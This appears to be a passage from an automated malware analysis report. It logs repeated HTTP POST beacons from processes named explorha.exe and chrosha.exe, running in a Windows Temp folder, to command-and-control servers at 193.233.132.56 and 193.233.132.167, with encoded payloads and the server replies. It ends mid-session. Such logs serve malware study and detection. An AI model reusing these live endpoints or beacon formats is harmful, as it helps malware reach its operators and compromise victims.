                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.645417929 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.896071911 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      654192.168.2.550500193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.909220934 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:59.148525953 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      655192.168.2.550501193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:59.255131960 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:59.499320030 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      656192.168.2.550502193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:59.399334908 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:59.650782108 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      657192.168.2.550503193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:59.748403072 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:59.998964071 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      658192.168.2.550504193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.011800051 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.262751102 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      659192.168.2.550505193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.350105047 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.594484091 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      660192.168.2.550506193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.521608114 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.780194044 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      661192.168.2.550507193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.843166113 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.092461109 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      662192.168.2.550508193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.135251045 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.383760929 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      663192.168.2.550509193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.457005024 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.700339079 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      664192.168.2.550510193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.638818979 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.894475937 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      665192.168.2.550511193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.943331957 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.188191891 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      666192.168.2.550512193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.255332947 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.498941898 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      667192.168.2.550513193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.550889015 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.793066025 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      668192.168.2.550514193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.747262001 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.996404886 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      669192.168.2.550515193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.041003942 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
